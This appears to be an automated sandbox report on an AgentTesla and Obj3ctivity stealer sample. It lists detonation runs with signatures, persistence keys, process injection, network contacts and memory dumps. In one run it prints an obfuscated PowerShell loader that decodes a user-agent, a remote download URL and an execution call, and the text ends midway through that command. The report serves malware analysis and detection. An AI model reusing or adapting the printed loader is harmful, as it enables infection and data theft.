Malware Analysis Report

2024-11-30 05:51

Sample ID: 241120-wxl39a1ka1
Target: 5eddfcfbde12dfd59c1ddd866546c9604f392d350ebc83a0ef58f5026e4fea4d
SHA256: 5eddfcfbde12dfd59c1ddd866546c9604f392d350ebc83a0ef58f5026e4fea4d
Tags: obj3ctivity discovery stealer agenttesla keylogger persistence spyware trojan execution
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK (Enterprise Matrix V15)

Analysis: static1 (Detonation Overview, Signatures)

Analysis: behavioral9, behavioral10, behavioral12, behavioral13, behavioral1, behavioral4, behavioral5, behavioral6, behavioral7, behavioral14, behavioral15, behavioral2, behavioral8, behavioral11, behavioral3 (each with Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

Score

10/10

SHA256

5eddfcfbde12dfd59c1ddd866546c9604f392d350ebc83a0ef58f5026e4fea4d

Threat Level: Known bad

The file 5eddfcfbde12dfd59c1ddd866546c9604f392d350ebc83a0ef58f5026e4fea4d was found to be: Known bad.

Malicious Activity Summary

obj3ctivity discovery stealer agenttesla keylogger persistence spyware trojan execution

Detects Obj3ctivity Stage1

Agenttesla family

Obj3ctivity, PXRECVOWEIWOEI

Obj3ctivity family

AgentTesla

Blocklisted process makes network request

Checks computer location settings

Command and Scripting Interpreter: PowerShell

Adds Run key to start application

Looks up external IP address via web service

AutoIT Executable

Suspicious use of SetThreadContext

Drops file in Windows directory

Program crash

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

Command and Scripting Interpreter: JavaScript

System Location Discovery: System Language Discovery

Unsigned PE

Office loads VBA resources, possible macro or embedded object present

Runs ping.exe

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Launches Equation Editor

Suspicious behavior: MapViewOfSection

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: AddClipboardFormatListener

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-20 18:18

Signatures

Detects Obj3ctivity Stage1

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Obj3ctivity family

obj3ctivity

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-20 18:18

Reported

2024-11-20 18:20

Platform

win10v2004-20241007-en

Max time kernel

93s

Max time network

144s

Command Line

"C:\Users\Admin\AppData\Local\Temp\92e0a7687dbabbecadf58d3f706e383909637c8ea4b0f49824f4c3929ff53435.exe"

Signatures

Detects Obj3ctivity Stage1

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Obj3ctivity family

obj3ctivity

Obj3ctivity, PXRECVOWEIWOEI

stealer obj3ctivity

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\92e0a7687dbabbecadf58d3f706e383909637c8ea4b0f49824f4c3929ff53435.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\92e0a7687dbabbecadf58d3f706e383909637c8ea4b0f49824f4c3929ff53435.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\92e0a7687dbabbecadf58d3f706e383909637c8ea4b0f49824f4c3929ff53435.exe

"C:\Users\Admin\AppData\Local\Temp\92e0a7687dbabbecadf58d3f706e383909637c8ea4b0f49824f4c3929ff53435.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1740 -ip 1740

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 1676

Network

Country Destination Domain Proto
US 8.8.8.8:53 whatismyipaddressnow.co udp
US 104.21.71.78:443 whatismyipaddressnow.co tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 72.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 78.71.21.104.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 66.209.201.84.in-addr.arpa udp

Files

memory/1740-0-0x0000000074B3E000-0x0000000074B3F000-memory.dmp

memory/1740-1-0x0000000000D90000-0x0000000000DA4000-memory.dmp

memory/1740-2-0x0000000074B30000-0x00000000752E0000-memory.dmp

memory/1740-3-0x0000000074B30000-0x00000000752E0000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-20 18:18

Reported

2024-11-20 18:20

Platform

win7-20240903-en

Max time kernel

121s

Max time network

129s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\967059c927f066a79905cf5a2f99562ca72409238322098e8ac93c905e75a1af.rtf"

Signatures

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor

exploit
Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\967059c927f066a79905cf5a2f99562ca72409238322098e8ac93c905e75a1af.rtf"

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

Network

Country Destination Domain Proto
US 8.8.8.8:53 hartac.co.za udp
ZA 154.0.162.16:80 hartac.co.za tcp
ZA 154.0.162.16:443 hartac.co.za tcp
ZA 154.0.162.16:443 hartac.co.za tcp
ZA 154.0.162.16:443 hartac.co.za tcp
ZA 154.0.162.16:443 hartac.co.za tcp

Files

memory/2472-0-0x000000002F1F1000-0x000000002F1F2000-memory.dmp

memory/2472-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2472-2-0x0000000070EFD000-0x0000000070F08000-memory.dmp

memory/2472-6-0x0000000070EFD000-0x0000000070F08000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-11-20 18:18

Reported

2024-11-20 18:20

Platform

win7-20240708-en

Max time kernel

120s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a9fef3bf43ae17b1ea2361ea59c5584caf762bd450dc8f120fdbf7f9fe523e96.exe"

Signatures

Detects Obj3ctivity Stage1

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Obj3ctivity family

obj3ctivity

Obj3ctivity, PXRECVOWEIWOEI

stealer obj3ctivity

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a9fef3bf43ae17b1ea2361ea59c5584caf762bd450dc8f120fdbf7f9fe523e96.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a9fef3bf43ae17b1ea2361ea59c5584caf762bd450dc8f120fdbf7f9fe523e96.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\a9fef3bf43ae17b1ea2361ea59c5584caf762bd450dc8f120fdbf7f9fe523e96.exe

"C:\Users\Admin\AppData\Local\Temp\a9fef3bf43ae17b1ea2361ea59c5584caf762bd450dc8f120fdbf7f9fe523e96.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3032 -s 1476

Network

Country Destination Domain Proto
US 8.8.8.8:53 whatismyipaddressnow.co udp
US 104.21.71.78:443 whatismyipaddressnow.co tcp

Files

memory/3032-0-0x00000000742AE000-0x00000000742AF000-memory.dmp

memory/3032-1-0x0000000000980000-0x0000000000996000-memory.dmp

memory/3032-2-0x00000000742A0000-0x000000007498E000-memory.dmp

memory/3032-3-0x00000000742A0000-0x000000007498E000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-11-20 18:18

Reported

2024-11-20 18:20

Platform

win10v2004-20241007-en

Max time kernel

94s

Max time network

137s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a9fef3bf43ae17b1ea2361ea59c5584caf762bd450dc8f120fdbf7f9fe523e96.exe"

Signatures

Detects Obj3ctivity Stage1

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Obj3ctivity family

obj3ctivity

Obj3ctivity, PXRECVOWEIWOEI

stealer obj3ctivity

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a9fef3bf43ae17b1ea2361ea59c5584caf762bd450dc8f120fdbf7f9fe523e96.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a9fef3bf43ae17b1ea2361ea59c5584caf762bd450dc8f120fdbf7f9fe523e96.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\a9fef3bf43ae17b1ea2361ea59c5584caf762bd450dc8f120fdbf7f9fe523e96.exe

"C:\Users\Admin\AppData\Local\Temp\a9fef3bf43ae17b1ea2361ea59c5584caf762bd450dc8f120fdbf7f9fe523e96.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 4876 -ip 4876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 1568

Network

Country Destination Domain Proto
US 8.8.8.8:53 66.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 whatismyipaddressnow.co udp
US 104.21.71.78:443 whatismyipaddressnow.co tcp
US 8.8.8.8:53 78.71.21.104.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 107.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

memory/4876-0-0x00000000750CE000-0x00000000750CF000-memory.dmp

memory/4876-1-0x0000000000020000-0x0000000000036000-memory.dmp

memory/4876-2-0x00000000750C0000-0x0000000075870000-memory.dmp

memory/4876-3-0x00000000750C0000-0x0000000075870000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-20 18:18

Reported

2024-11-20 18:20

Platform

win7-20240903-en

Max time kernel

120s

Max time network

128s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Agenttesla family

agenttesla

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\Running = "C:\\Users\\Admin\\AppData\\Roaming\\Running\\Running.exe" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2532 set thread context of 1588 N/A C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2532 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2532 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2532 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2532 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2532 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2532 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2532 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2532 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe

"C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:443 api.ipify.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp

Files

memory/2532-10-0x0000000000130000-0x0000000000134000-memory.dmp

memory/1588-11-0x0000000000400000-0x0000000000442000-memory.dmp

memory/1588-15-0x0000000000400000-0x0000000000442000-memory.dmp

memory/1588-14-0x0000000000400000-0x0000000000442000-memory.dmp

memory/1588-16-0x00000000742AE000-0x00000000742AF000-memory.dmp

memory/1588-17-0x00000000742A0000-0x000000007498E000-memory.dmp

memory/1588-20-0x00000000742AE000-0x00000000742AF000-memory.dmp

memory/1588-21-0x00000000742A0000-0x000000007498E000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-20 18:18

Reported

2024-11-20 18:20

Platform

win7-20240903-en

Max time kernel

122s

Max time network

124s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\76a5d5651a6bb05f67e88fb646e969963c8f3baeda763a86649d4cd2f2ff967b.js

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\wscript.exe N/A
N/A N/A C:\Windows\system32\wscript.exe N/A

Command and Scripting Interpreter: JavaScript

execution

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\76a5d5651a6bb05f67e88fb646e969963c8f3baeda763a86649d4cd2f2ff967b.js

Network

Country Destination Domain Proto
US 8.8.8.8:53 paste.ee udp
US 172.67.187.200:443 paste.ee tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 104.86.110.81:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 2.22.5.218:80 www.microsoft.com tcp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-20 18:18

Reported

2024-11-20 18:20

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

156s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\76a5d5651a6bb05f67e88fb646e969963c8f3baeda763a86649d4cd2f2ff967b.js

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\wscript.exe N/A
N/A N/A C:\Windows\system32\wscript.exe N/A
N/A N/A C:\Windows\system32\wscript.exe N/A

Command and Scripting Interpreter: JavaScript

execution

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\76a5d5651a6bb05f67e88fb646e969963c8f3baeda763a86649d4cd2f2ff967b.js

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 paste.ee udp
US 104.21.84.67:443 paste.ee tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 67.84.21.104.in-addr.arpa udp
US 8.8.8.8:53 68.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 101.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 41.173.79.40.in-addr.arpa udp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-20 18:18

Reported

2024-11-20 18:20

Platform

win7-20241010-en

Max time kernel

126s

Max time network

132s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8be322fd5399068e2db918866ec0011882c308226f9c8065df643dbcd4d7e998.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2600 wrote to memory of 2160 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 2600 wrote to memory of 2160 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 2600 wrote to memory of 2160 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 2600 wrote to memory of 2188 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 2600 wrote to memory of 2188 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 2600 wrote to memory of 2188 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 2600 wrote to memory of 2888 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 2600 wrote to memory of 2888 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 2600 wrote to memory of 2888 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 2600 wrote to memory of 2840 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 2840 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 2840 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2840 wrote to memory of 2704 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2840 wrote to memory of 2704 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2840 wrote to memory of 2704 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2840 wrote to memory of 2804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2840 wrote to memory of 2804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2840 wrote to memory of 2804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2840 wrote to memory of 2804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2804 wrote to memory of 2664 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2664 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2664 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2664 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8be322fd5399068e2db918866ec0011882c308226f9c8065df643dbcd4d7e998.vbs"

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping %.%.%.%

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c dir

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe


C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Magtkampens.Bib && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$graanes = 1;Function Steatolytic($Feltsengenes){$Procereal=$Feltsengenes.Length-$graanes;$Bagger='Substring';For( $Enligtstilledes=5;$Enligtstilledes -lt $Procereal;$Enligtstilledes+=6){$Uncleanlily164+=$Feltsengenes.$Bagger.Invoke( $Enligtstilledes, $graanes);}$Uncleanlily164;}function schlepper($Lamond){ . ($Vittighed) ($Lamond);}$Xenofobi=Steatolytic 'E terMUnabsoFeatuzHeteriBilinl EnkrlNeumaaPigtr/Disco5M.xop. Taxo0 .dtm Viss (Vi cuWSlu,niLineanSem.edColo,oToptywAn.ets Cham SoreoNRangeTKambr octag1 Abol0Slaae.Tughr0Dispa;wiene gypp,W TeapiSlavenGramm6 T si4Dyarc;Ab,li Strogx Boo 6Pricy4S aln;Teach Fo osromkvdv roo:C,ino1 Non.2horke1Spytk.Acc,d0Deoxi)Natur TredvGShelleLibr c rustkMarmooMonod/Indkb2Assem0Cytod1,rykk0Digit0 Fors1Ma,le0Exten1Count uftkFPer.giFejlsrNedtre.rrelfteughoGel,txPangs/.ekru1An dy2Ragou1 rape.Arres0 Se,s ';$Dingdong=Steatolytic 'QuizmUCirk sIronsedruknrunipe-Uni.pAInyokgTritiePock,ntartatAplit ';$Externalism=Steatolytic 'MorgahRe iot.ssemtRecurpFortr:acrop/ Bl,d/RotorwDetaiw.opulw Jagt.YngleeLivsvnHe.ereSquirrUnderg SubtyPrecr-OpdrtsCra ne abesrAnativSnuse.An iarEgal.oMamba/ClaviGSpotseante,nDi etf s ksoPurprrAntite Re lnChe.kiKastsnAutorg laresU,enl.Bivu,d TainwPaa.rpMidtv ';$Underbeak=Steatolytic 'aw le>Veder ';$Vittighed=Steatolytic 'overaiDistre,omanxSc,th ';$Bibeholdelsernes='Skolelreren';$Klediskenes = Steatolytic '.etapeGartncrhinsh HjdeoFaris Mult%,orbiaKababpSpottpSpathdconchaScofft Mu iaP eud%fort.\ StilMSrsk a BlgegFuelstPerisknut,aa CrypmNonstpPeasaeAmerinOvoges Fi.m. AlleBH,rseiThi,tbMids. Besv & Kede&Mohik StabeeUnnumc IrrehApopho Regl BikortUpway ';schlepper (Steatolytic 'Gifte$MylohgLoghelPolteovizorbSki maOpercl Bams:Fet.cSTyperq AbseuConnea Homim Avan=H ndy(DupskcInd.mmR dredInte perig/ R cicBr.ss Se.ge$DiffeKFagl.lFrosteTopf dUnreai R susUnderk HuggeRejecn repreUnc rs,rgan) Empo ');schlepper (Steatolytic 'Rdgr,$Ab,trgMgbunl KomtoFiskebgravlaCarmel Indl: GlosCUrsoluSiouxrMestraStilttM scei lottcBouga2 Topn3Dia,o2 Bram=Ecdys$sv.psEMyr,ex BeritPre,geAnsigrCa lenI,peta.orrelAndetiHenvesPytonmMono..EnshasAntagp spedlUdtydiOverptStu p(Elapi$HeterUUnrewnHferhd .kskePipi.rBedlab SetieProkua NonlkFejlb)Demur ');$Externalism=$Curatic232[0];$Coenenchym= (Steatolytic 'Fiske$Pol,cgskadelEloigo Fiskb P,liaIs,aml Vrdi:DiskeTNedslhSca ieBoehmr,lowheFattib.otizyale t=SuperNBiklaeTreatwTropi-VidenONontebenth jGennee GenncbefoltEta.r EfterSGavlhyVandks GunltL.xineLik,imAndel.InopeNKotoweS.ppotPosta.So,teW IsoceGrandbSupp,CFor al,lassi .miteundernBor.rt');$Coenenchym+=$Squam[1];schlepper ($Coenenchym);schlepper (Steatolytic ' ondo$InvenTVehefh udeneTur.erPsycheWithobOstomyMa,tr.scariH PhyteUnbeaaPatted KofieHydrorPsychsprota[Briar$AlloxDImpl i TrionLysn,gobligdDarnso Tou nAvifagAntic]Damga= etag$SekteXErbiue TabunIllibouroenfH,poto BrdebBl,nniRaci, ');$Pedicellated159=Steatolytic 'Skrmf$ andTPreaghSkurke Fal.r nemoeStipubArbejy Unav. PsycDsemisoProblwJertfnS ddel Stifo Udsia,eridd armhF 